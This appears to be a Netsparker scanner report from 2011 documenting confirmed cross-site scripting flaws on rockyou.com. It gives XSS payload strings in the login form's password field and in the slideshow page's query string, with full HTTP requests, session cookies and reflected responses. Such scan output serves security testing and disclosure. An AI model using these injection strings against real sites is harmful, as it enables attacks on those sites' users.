<!--script type="text/javascript">var likeParams = ['01078cba91618ea1','drawerbutton'];</script><script type="text/javascript" src="http://partner.like.com/likesense/rockyou.js"></script-->
</div>
</td>
</tr>
</table>
</div>
</div>
<style>
#photothumbs a:link {color:#ffffff;}
</style>
<table style="margin: 0 auto; clear:both" width="450px"><tr>
<script>
function showPagelet(p) {
document.getElementById('sharePagelet').style.display='none';
document.getElementById('ratePagelet').style.display='none';
document.getElementById(p).style.display='';
}
</script>
<td><a href="#" onclick="ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-share&value=showmygallery',null,null); showPagelet('sharePagelet'); return false;">SHARE</a></td>
<td><a href="#" onclick="showPagelet('ratePagelet'); return false;">RATE</a></td>
<td><a href="http://www.rockyou.com/events/track.php?event=rockyou-makeaslideshow&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Fviewpage_clickthrough.php%3Fwidget%3Dslideshow%26instanceid%3D%26amp%3B%23039%3B%2Bnetsparker%289%29%2B%26amp%3B%23039%3B">MAKE A SLIDESHOW</a></td>
<td><a href="http://www.rockyou.com/events/track.php?event=rockyou-addtofavorites&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Faddfavorite.php%3Finstanceid%3D%26amp%3B%23039%3B%2Bnetsparker%289%29%2B%26amp%3B%23039%3B">ADD TO FAVORITES</a></td>
<td><a href="http://www.rockyou.com/events/track.php?event=rockyou-report&value=showmygallery&url=http%3A%2F%2Fwww.rockyou.com%2Fsetinappropriate.php%3Finstanceid%3D%26amp%3B%23039%3B%2Bnetsparker%289%29%2B%26amp%3B%23039%3B">REPORT</a></td>
</tr></table>
<div id="ajaxarea" style="width:450px; height:100px; background: #f51768; margin: 10px auto" >
<div id="sharePagelet" style="padding: 10..
|
- /login.php
/login.php CONFIRMED |
Parameters
| Parameter | Type | Value |
| lang | GET | en |
| pass | POST | '"--></style></script><script>alert(0x000E34)</script> |
| user | POST | 3 |
| mode | POST | create |
| source | POST | 3 |
| flixster | POST | 3 |
| toscheck | POST | 1 |
| birthyear | POST | 3 |
| sex | POST | 3 |
| country | POST | 0 |
| postalcode | POST | 3 |
Request
POST /login.php?lang=en HTTP/1.1
Referer: http://www.rockyou.com/login.php?lang=en
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303164568; ctid=2; sns_type=rockyou.com; istack=%7C%7C%7Cwww202.rockyou.com%7C%7C158776805%7Cwww202.rockyou.com%7C%7C158776806%7Cwww202.rockyou.com%7C%7C158776807%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com; referralid=13193054; pubtype=facebook; ultype=facebook
Content-Length: 181
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
pass='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000E34)%3c%2fscript%3e&user=3&mode=create&source=3&flixster=3&toscheck=1&birthyear=3&sex=3&country=0&postalcode=3
Referer: http://www.rockyou.com/login.php?lang=en
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303164568; ctid=2; sns_type=rockyou.com; istack=%7C%7C%7Cwww202.rockyou.com%7C%7C158776805%7Cwww202.rockyou.com%7C%7C158776806%7Cwww202.rockyou.com%7C%7C158776807%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com; referralid=13193054; pubtype=facebook; ultype=facebook
Content-Length: 181
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
pass='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000E34)%3c%2fscript%3e&user=3&mode=create&source=3&flixster=3&toscheck=1&birthyear=3&sex=3&country=0&postalcode=3
Response
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 22:09:28 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 22:09:27 GMT; path=/; domain=.rockyou.com,lastlogin=1303164568; expires=Wed, 27-Jul-2011 22:09:28 GMT; path=/; domain=.rockyou.com,sns_type=rockyou.com; expires=Mon, 25-Apr-2011 22:09:28 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=89808 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 9055
Connection: close
Content-Type: text/html; charset=UTF-8
<script>
function positionAdDiv(centerDivID, adDivID, side) {
var centerDiv = document.getElementById(centerDivID);
var adDiv = document.getElementById(adDivID);
// Get absolute positioning of
var leftside = topside = 0;
var elem = centerDiv;
if (elem.offsetParent)
do {
leftside += elem.offsetLeft;
topside += elem.offsetTop;
}
while(elem = elem.offsetParent);
adDiv.style.top = topside + 'px';
// If the left side of the ad div is left of the left side of the center div, it should be on the left
if (side == 'left') adDiv.style.left = leftside - adDiv.offsetWidth +'px';
else adDiv.style.left = leftside + centerDiv.offsetWidth +'px';
}
</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><HTML><HEAD> <link href="/css/standard.css" rel="stylesheet" type="text/css"><script src="/js/standard.js" type="text/javascript"></script><link href="/css/simple_bling3.css" rel="stylesheet" type="text/css"><link href="/css/center_footer.css" rel="stylesheet" type="text/css"><link href="/css/style.css" rel="stylesheet" type="text/css"> <link href="/css/bling3_header.css" rel="stylesheet" type="text/css"> <TITLE>RockYou.com - Photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE> <link rel="icon" type="image/ico" href="/favicon.ico" /> </HEAD><BODY ><div style="text-align:center"> <div class="nav-bar"></div> <div class="nav-main"> <div class="nav-spacer" style="background:none;margin-right:25px;float:right"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-help&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com%2Fhelp">Help</a></div> <div style="clear:both; position:relative;text-align:left;"> <div style="cursor:pointer; position:absolute;" onclick="window.location='http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-frontpage&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com'" class="png-logo" style='filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png");'> <img src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png" class="transparent"/> </div> </div> </div> <br><div id="topDiv" style="margin:auto;width:720px;text-align:center">
<!-- Ad call for Ad call for http://rocku.adbureau.net/hserver/area=NONE/aamsz=LEADERBOARD/ -->
<script language="javascript">
if (!pageNum) var pageNum = Math.round(Math.random() * 1000000);
var aamRnd = Math.round(Math.random() * 10000000000);
document.writeln('<iframe src="http://rocku.adbureau.net/hserver/acc_random=' +
aamRnd + '/pageid=' + pageNum + '/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/" ' +
'width="728" height="90" marginwidth="0" marginheight="0" ' +
'frameborder="0" scrolling="no"></iframe>');
</script>
<noscript>
<a href="http://rocku.adbureau.net/adclick/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" target="_blank">
<img src="http://rocku.adbureau.net/nserver/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" border="0" />
</a>
</noscript>
</div><br>
<table width="600" cellpadding="25" style="margin: auto; border: 1px #999999 solid; background: #DFDFDF"><tr><td align="center">
<script type="text/javascript" language="javascript" src="http://cdn.rockyou.com/apps/mainsite/js/ajax.js"></script><script type="text/javascript" language="javascript" src="/js/country.js?ver=1"></script><script type="text/javascript" language="javascript">function getuser(status, userEmail){ accountstatus = status; if (accountstatus > 1) //Account Exists { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display=""; setError(""); document.getElementById('loginforma').pass.focus(); } else if (accountstatus == -1) // No Account { var start = userEmail.indexOf('@')+1; var emailType = userEmail.substr(start, userEmail.indexOf('.') - start); if (emailType == 'myspace') { document.getElementById("emailforma").reset(); document.getElementById("msg").innerHTML = 'Sorry, myspace.com emails are not valid.<br>Please choose another.'; return 1; } else if (emailName = isVerifiableEmail(emailType)) { var lcArray = document.getElementsByName('emailname-container'); for (i in lcArray) { lcArray[i].innerHTML = emailName; } document.getElementById('email-container').innerHTML = userEmail; document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display=""; document.getElementById("loginform").style.display="none"; setError(''); document.getElementById("createform2a").useEmailPassword.value = emailType;// show superpets login hint } else { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();// show superpets login hint } } else { if (status == "Invalid Email Format! (joe@somebody.com)") status = "Invalid Email Format! (joe@somebody.com)"; document.getElementById("msg").innerHTML = status; } return 1;}// Check if the new email is one that can be verified by 3rd party scripts. If so, return the name to be displayed.function isVerifiableEmail(emailType) { switch(emailType) { case 'gmail': return 'Gmail'; case 'yahoo': return 'Yahoo'; case 'aol': return 'AOL'; case 'msn': return 'MSN'; case 'hotmail': return 'Hotmail'; default: return false; }}// resetform is only called by back buttonsfunction resetform() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-back&value=mainlogin',null,null); document.getElementById("emailform").style.display=""; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); //document.getElementById('emailforma').pass.focus();// show superpets login hint return false;}function setError(error) { document.getElementById("msg").innerHTML = error;}// checkuser is called on sending of email addressfunction checkuser(user){ ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-checkuid&value=mainlogin',null,null); if(user=="") { setError("Entry was Empty!"); return ; } var strURL="/checkuser.php"; var xmlHttpReq = false; var self = this; var userEmail = user; setError("Processing"); // Mozilla/Safari if (window.XMLHttpRequest) { self.xmlHttpReq = new XMLHttpRequest(); } // IE else if (window.ActiveXObject) { self.xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP"); } self.xmlHttpReq.open('POST', strURL, true); self.xmlHttpReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; Charset=utf-8"); self.xmlHttpReq.onreadystatechange = function() { if (self.xmlHttpReq.readyState == 4) { getuser(self.xmlHttpReq.responseText, userEmail); } } self.xmlHttpReq.send("user="+escape(user));}function updatepage(str){ document.getElementById("stat").innerHTML = str;}var isNN = (navigator.appName.indexOf("Netscape")!=-1);function autoTab(input,len, e) { var keyCode = (isNN) ? e.which : e.keyCode; var filter = (isNN) ? [0,8,9] : [0,8,9,16,17,18,37,38,39,40,46]; if(input.value.length >= len && !containsElement(filter,keyCode)) { input.value = input.value.slice(0, len); input.form[(getIndex(input)+1) % input.form.length].focus(); } function containsElement(arr, ele) { var found = false, index = 0; while(!found && index < arr.length) if(arr[index] == ele) found = true; else index++; return found; } function getIndex(input) { var index = -1, i = 0, found = false; while (i < input.form.length && index == -1) if (input.form[i] == input)index = i; else i++; return index; } return true;}function finishLoginNew() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new&value=mainlogin',null,null); document.getElementById('createforma').user.value = document.getElementById('emailforma').user.value;}function finishLoginNewVerified() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new-verified&value=mainlogin',null,null); document.getElementById('createform2a').user.value = document.getElementById('emailforma').user.value;}function finishLogin() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-pass&value=mainlogin',null,null); document.getElementById('loginforma').user.value = document.getElementById('emailforma').user.value;}function use_rockyou_pass() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-torypass&value=mainlogin',null,null); document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();}</script><table border="0" cellpadding="0" cellspacing="0"><tr><td><img src="/images/back-uploadtop.gif" /></td></tr><tr><td background="/images/back-uploadtile.gif" style="padding-left:10px"><font class="bigorange">Login </font><font class="bigblack">or Create an Account</font><br><br><div id="emailform" style="display:none"><form name="emailforma" id="emailforma" onSubmit="checkuser(this.user.value);return false;"><span>Email address</span><input type="text" name="user" id="emailinput" value="3"><br /><input id="submitbutton" type="submit" value="Create / Login"></form></div><div id="createform" style="display:block"><form name="createforma" id="createforma" method="post" action="" onsubmit="finishLoginNew();">Enter password to register.<br /><span>Password</span><input type="password" name="pass" id="pass" value="\'\"--></style></script><script>netsparker(0x000E34)</script>"><br /><input type="hidden" name="user" id="user" value="3"><input type="hidden" name="mode" value="create"><input type="hidden" name="source" value=""><input type="hidden" name="flixster" ><input type="checkbox" name="toscheck" id="toscheck" checked='checked' value="1"><span>I agree to the <a href="/tos.php" target="_blank">Terms of Service.</a></span><br /><div style="margin-top:5px;margin-bottom:5px;background-color:#d6e1fc;border:1px solid #a5bcfb;position:relative;width:305px"> <div style="padding:5px 5px 0px 5px;"> <div style="float:left;display:inline;margin-right:5px;margin-bottom:5px;">Birth Year <select name="birthyear"><option value=""></option><option value="1998">1998</option><option value="1997">1997</option><option value="1996">1996</option><option value="1995">1995</option><option value="1994">1994</option><option value="1993">1993</option><option value="1992">1992</option><option value="1991">1991</option><option value="1990">1990</option><option value="1989">1989</option><option value="1988">1988</option><option value="1987">1987</option><option value="1986">1986</option><option value="1985">1985</option><option value="1984">1984</option><option value="1983">1983</option><option value="1982">1982</option><option value="1981">1981</option><option value="1980">1980</option><option value="1979">1979</option><option value="1978">1978</option><option value="1977">1977</option><option value="1976">1976</option><option value="1975">1975</option><option value="1974">1974</option><option value="1973">1973</option><option value="1972">1972</option><option value="1971">1971</option><option value="1970">1970</option><option value="1969">1969</option><option value="1968">1968</option><option value="1967">1967</option><option value="1966">1966</option><option value="1965">1965</option><option value="1964">1964</option><option value="1963">1963</option><option value="1962">1962</option><option value="1961">1961</option><option value="1960">1960</option><option value="1959">1959</option><option value="1958">1958</option><option value="1957">1957</option><option value="1956">1956</option><option value="1955">1955</option><option value="1954">1954</option><option value="1953">1953</option><option value="1952">1952</option><option value="1951">1951</option><option value="1950">1950</option><option value="1949">1949</option><option value="1948">1948</option><option value="1947">1947</option><option value="1946">1946</option><option value="1945">1945</option><option value="1944">1944</option><option value="1943">1943</option><option value="1942">1942</option><option value="1941">1941</option><option value="1940">1940</option><option value="1939">1939</option><option value="1938">1938</option><option value="1937">1937</option><option value="1936">1936</option><option value="1935">1935</option><option value="1934">1934</option><option value="1933">1933</option><option value="1932">1932</option><option value="1931">1931</option><option value="1930">1930</option><option value="1929">1929</option><option value="1928">1928</option><option value="1927">1927</option><option value="1926">1926</option><option value="1925">1925</option><option value="1924">1924</option><option value="1923">1923</option><option value="1922">1922</option><option value="1921">1921</option><option value="1920">1920</option><option value="1919">1919</option><option value="1918">1918</option><option value="1917">1917</option><option value="1916">1916</option><option value="1915">1915</option><option value="1914">1914</option><option value="1913">1913</option><option value="1912">1912</option><o..
Date: Mon, 18 Apr 2011 22:09:28 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 22:09:27 GMT; path=/; domain=.rockyou.com,lastlogin=1303164568; expires=Wed, 27-Jul-2011 22:09:28 GMT; path=/; domain=.rockyou.com,sns_type=rockyou.com; expires=Mon, 25-Apr-2011 22:09:28 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=89808 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 9055
Connection: close
Content-Type: text/html; charset=UTF-8
<script>
function positionAdDiv(centerDivID, adDivID, side) {
var centerDiv = document.getElementById(centerDivID);
var adDiv = document.getElementById(adDivID);
// Get absolute positioning of
var leftside = topside = 0;
var elem = centerDiv;
if (elem.offsetParent)
do {
leftside += elem.offsetLeft;
topside += elem.offsetTop;
}
while(elem = elem.offsetParent);
adDiv.style.top = topside + 'px';
// If the left side of the ad div is left of the left side of the center div, it should be on the left
if (side == 'left') adDiv.style.left = leftside - adDiv.offsetWidth +'px';
else adDiv.style.left = leftside + centerDiv.offsetWidth +'px';
}
</script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><HTML><HEAD> <link href="/css/standard.css" rel="stylesheet" type="text/css"><script src="/js/standard.js" type="text/javascript"></script><link href="/css/simple_bling3.css" rel="stylesheet" type="text/css"><link href="/css/center_footer.css" rel="stylesheet" type="text/css"><link href="/css/style.css" rel="stylesheet" type="text/css"> <link href="/css/bling3_header.css" rel="stylesheet" type="text/css"> <TITLE>RockYou.com - Photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE> <link rel="icon" type="image/ico" href="/favicon.ico" /> </HEAD><BODY ><div style="text-align:center"> <div class="nav-bar"></div> <div class="nav-main"> <div class="nav-spacer" style="background:none;margin-right:25px;float:right"><a href="http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-help&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com%2Fhelp">Help</a></div> <div style="clear:both; position:relative;text-align:left;"> <div style="cursor:pointer; position:absolute;" onclick="window.location='http://www.rockyou.com/events/track.php?event=rockyou-fullbling3-frontpage&value=mainlogin&url=http%3A%2F%2Fwww.rockyou.com'" class="png-logo" style='filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png");'> <img src="https://rockyou.com/contents/fullbling3_header/ry_logo28.png" class="transparent"/> </div> </div> </div> <br><div id="topDiv" style="margin:auto;width:720px;text-align:center">
<!-- Ad call for Ad call for http://rocku.adbureau.net/hserver/area=NONE/aamsz=LEADERBOARD/ -->
<script language="javascript">
if (!pageNum) var pageNum = Math.round(Math.random() * 1000000);
var aamRnd = Math.round(Math.random() * 10000000000);
document.writeln('<iframe src="http://rocku.adbureau.net/hserver/acc_random=' +
aamRnd + '/pageid=' + pageNum + '/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/" ' +
'width="728" height="90" marginwidth="0" marginheight="0" ' +
'frameborder="0" scrolling="no"></iframe>');
</script>
<noscript>
<a href="http://rocku.adbureau.net/adclick/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" target="_blank">
<img src="http://rocku.adbureau.net/nserver/area=NONE/aamsz=LEADERBOARD/AGE=/GENDER=/pageid=1" border="0" />
</a>
</noscript>
</div><br>
<table width="600" cellpadding="25" style="margin: auto; border: 1px #999999 solid; background: #DFDFDF"><tr><td align="center">
<script type="text/javascript" language="javascript" src="http://cdn.rockyou.com/apps/mainsite/js/ajax.js"></script><script type="text/javascript" language="javascript" src="/js/country.js?ver=1"></script><script type="text/javascript" language="javascript">function getuser(status, userEmail){ accountstatus = status; if (accountstatus > 1) //Account Exists { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display=""; setError(""); document.getElementById('loginforma').pass.focus(); } else if (accountstatus == -1) // No Account { var start = userEmail.indexOf('@')+1; var emailType = userEmail.substr(start, userEmail.indexOf('.') - start); if (emailType == 'myspace') { document.getElementById("emailforma").reset(); document.getElementById("msg").innerHTML = 'Sorry, myspace.com emails are not valid.<br>Please choose another.'; return 1; } else if (emailName = isVerifiableEmail(emailType)) { var lcArray = document.getElementsByName('emailname-container'); for (i in lcArray) { lcArray[i].innerHTML = emailName; } document.getElementById('email-container').innerHTML = userEmail; document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display=""; document.getElementById("loginform").style.display="none"; setError(''); document.getElementById("createform2a").useEmailPassword.value = emailType;// show superpets login hint } else { document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();// show superpets login hint } } else { if (status == "Invalid Email Format! (joe@somebody.com)") status = "Invalid Email Format! (joe@somebody.com)"; document.getElementById("msg").innerHTML = status; } return 1;}// Check if the new email is one that can be verified by 3rd party scripts. If so, return the name to be displayed.function isVerifiableEmail(emailType) { switch(emailType) { case 'gmail': return 'Gmail'; case 'yahoo': return 'Yahoo'; case 'aol': return 'AOL'; case 'msn': return 'MSN'; case 'hotmail': return 'Hotmail'; default: return false; }}// resetform is only called by back buttonsfunction resetform() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-back&value=mainlogin',null,null); document.getElementById("emailform").style.display=""; document.getElementById("createform").style.display="none"; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); //document.getElementById('emailforma').pass.focus();// show superpets login hint return false;}function setError(error) { document.getElementById("msg").innerHTML = error;}// checkuser is called on sending of email addressfunction checkuser(user){ ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-checkuid&value=mainlogin',null,null); if(user=="") { setError("Entry was Empty!"); return ; } var strURL="/checkuser.php"; var xmlHttpReq = false; var self = this; var userEmail = user; setError("Processing"); // Mozilla/Safari if (window.XMLHttpRequest) { self.xmlHttpReq = new XMLHttpRequest(); } // IE else if (window.ActiveXObject) { self.xmlHttpReq = new ActiveXObject("Microsoft.XMLHTTP"); } self.xmlHttpReq.open('POST', strURL, true); self.xmlHttpReq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; Charset=utf-8"); self.xmlHttpReq.onreadystatechange = function() { if (self.xmlHttpReq.readyState == 4) { getuser(self.xmlHttpReq.responseText, userEmail); } } self.xmlHttpReq.send("user="+escape(user));}function updatepage(str){ document.getElementById("stat").innerHTML = str;}var isNN = (navigator.appName.indexOf("Netscape")!=-1);function autoTab(input,len, e) { var keyCode = (isNN) ? e.which : e.keyCode; var filter = (isNN) ? [0,8,9] : [0,8,9,16,17,18,37,38,39,40,46]; if(input.value.length >= len && !containsElement(filter,keyCode)) { input.value = input.value.slice(0, len); input.form[(getIndex(input)+1) % input.form.length].focus(); } function containsElement(arr, ele) { var found = false, index = 0; while(!found && index < arr.length) if(arr[index] == ele) found = true; else index++; return found; } function getIndex(input) { var index = -1, i = 0, found = false; while (i < input.form.length && index == -1) if (input.form[i] == input)index = i; else i++; return index; } return true;}function finishLoginNew() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new&value=mainlogin',null,null); document.getElementById('createforma').user.value = document.getElementById('emailforma').user.value;}function finishLoginNewVerified() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-new-verified&value=mainlogin',null,null); document.getElementById('createform2a').user.value = document.getElementById('emailforma').user.value;}function finishLogin() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-pass&value=mainlogin',null,null); document.getElementById('loginforma').user.value = document.getElementById('emailforma').user.value;}function use_rockyou_pass() { ajax_post_john('/events/include/ajaxtrackevent.php','name=rockyou-login-torypass&value=mainlogin',null,null); document.getElementById("emailform").style.display="none"; document.getElementById("createform").style.display=""; document.getElementById("createform2").style.display="none"; document.getElementById("loginform").style.display="none"; setError(""); document.getElementById('createforma').pass.focus();}</script><table border="0" cellpadding="0" cellspacing="0"><tr><td><img src="/images/back-uploadtop.gif" /></td></tr><tr><td background="/images/back-uploadtile.gif" style="padding-left:10px"><font class="bigorange">Login </font><font class="bigblack">or Create an Account</font><br><br><div id="emailform" style="display:none"><form name="emailforma" id="emailforma" onSubmit="checkuser(this.user.value);return false;"><span>Email address</span><input type="text" name="user" id="emailinput" value="3"><br /><input id="submitbutton" type="submit" value="Create / Login"></form></div><div id="createform" style="display:block"><form name="createforma" id="createforma" method="post" action="" onsubmit="finishLoginNew();">Enter password to register.<br /><span>Password</span><input type="password" name="pass" id="pass" value="\'\"--></style></script><script>netsparker(0x000E34)</script>"><br /><input type="hidden" name="user" id="user" value="3"><input type="hidden" name="mode" value="create"><input type="hidden" name="source" value=""><input type="hidden" name="flixster" ><input type="checkbox" name="toscheck" id="toscheck" checked='checked' value="1"><span>I agree to the <a href="/tos.php" target="_blank">Terms of Service.</a></span><br /><div style="margin-top:5px;margin-bottom:5px;background-color:#d6e1fc;border:1px solid #a5bcfb;position:relative;width:305px"> <div style="padding:5px 5px 0px 5px;"> <div style="float:left;display:inline;margin-right:5px;margin-bottom:5px;">Birth Year <select name="birthyear"><option value=""></option><option value="1998">1998</option><option value="1997">1997</option><option value="1996">1996</option><option value="1995">1995</option><option value="1994">1994</option><option value="1993">1993</option><option value="1992">1992</option><option value="1991">1991</option><option value="1990">1990</option><option value="1989">1989</option><option value="1988">1988</option><option value="1987">1987</option><option value="1986">1986</option><option value="1985">1985</option><option value="1984">1984</option><option value="1983">1983</option><option value="1982">1982</option><option value="1981">1981</option><option value="1980">1980</option><option value="1979">1979</option><option value="1978">1978</option><option value="1977">1977</option><option value="1976">1976</option><option value="1975">1975</option><option value="1974">1974</option><option value="1973">1973</option><option value="1972">1972</option><option value="1971">1971</option><option value="1970">1970</option><option value="1969">1969</option><option value="1968">1968</option><option value="1967">1967</option><option value="1966">1966</option><option value="1965">1965</option><option value="1964">1964</option><option value="1963">1963</option><option value="1962">1962</option><option value="1961">1961</option><option value="1960">1960</option><option value="1959">1959</option><option value="1958">1958</option><option value="1957">1957</option><option value="1956">1956</option><option value="1955">1955</option><option value="1954">1954</option><option value="1953">1953</option><option value="1952">1952</option><option value="1951">1951</option><option value="1950">1950</option><option value="1949">1949</option><option value="1948">1948</option><option value="1947">1947</option><option value="1946">1946</option><option value="1945">1945</option><option value="1944">1944</option><option value="1943">1943</option><option value="1942">1942</option><option value="1941">1941</option><option value="1940">1940</option><option value="1939">1939</option><option value="1938">1938</option><option value="1937">1937</option><option value="1936">1936</option><option value="1935">1935</option><option value="1934">1934</option><option value="1933">1933</option><option value="1932">1932</option><option value="1931">1931</option><option value="1930">1930</option><option value="1929">1929</option><option value="1928">1928</option><option value="1927">1927</option><option value="1926">1926</option><option value="1925">1925</option><option value="1924">1924</option><option value="1923">1923</option><option value="1922">1922</option><option value="1921">1921</option><option value="1920">1920</option><option value="1919">1919</option><option value="1918">1918</option><option value="1917">1917</option><option value="1916">1916</option><option value="1915">1915</option><option value="1914">1914</option><option value="1913">1913</option><option value="1912">1912</option><o..
|
- /slideshow-create.php
/slideshow-create.php CONFIRMED |
Parameters
| Parameter | Type | Value |
| refid | GET | |
| Query Based | QUERYSTRING | '"--></style></script><script>alert(0x000E47)</script> |
Request
GET /slideshow-create.php?'"--></style></script><script>netsparker(0x000E47)</script> HTTP/1.1
Referer: http://www.rockyou.com/help/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303164579; ctid=2; sns_type=rockyou.com; istack=%7C%7C%7Cwww202.rockyou.com%7C%7C158776805%7Cwww202.rockyou.com%7C%7C158776806%7Cwww202.rockyou.com%7C%7C158776807%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com; referralid=13193054; pubtype=facebook; ultype=facebook
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Referer: http://www.rockyou.com/help/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.rockyou.com
Cookie: PHPSESSID=j1le0nb5c52v0lohlmb2bhb1l3; lang=en; lastlogin=1303164579; ctid=2; sns_type=rockyou.com; istack=%7C%7C%7Cwww202.rockyou.com%7C%7C158776805%7Cwww202.rockyou.com%7C%7C158776806%7Cwww202.rockyou.com%7C%7C158776807%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com; referralid=13193054; pubtype=facebook; ultype=facebook
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Response
HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 22:09:40 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 22:09:39 GMT; path=/; domain=.rockyou.com,lastlogin=1303164580; expires=Wed, 27-Jul-2011 22:09:40 GMT; path=/; domain=.rockyou.com,sns_type=rockyou.com; expires=Mon, 25-Apr-2011 22:09:40 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
Content-Encoding:
X-RyHeader: www202.rockyou.com took D=26673 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 26870
Connection: close
Content-Type: text/html; charset=UTF-8
<HTML>
<HEAD>
<TITLE>RockYou.com - photo sharing, MySpace slideshows, MySpace codes, MySpace music</TITLE>
<script type="text/javascript">
<!--
function newImage(arg) {
if (document.images) {
rslt = new Image();
rslt.src = arg;
return rslt;
}
}
function changeImages() {
if (document.images && (preloadFlag == true)) {
for (var i=0; i<changeImages.arguments.length; i+=2) {
document[changeImages.arguments[i]].src = changeImages.arguments[i+1];
}
}
}
var preloadFlag = false;
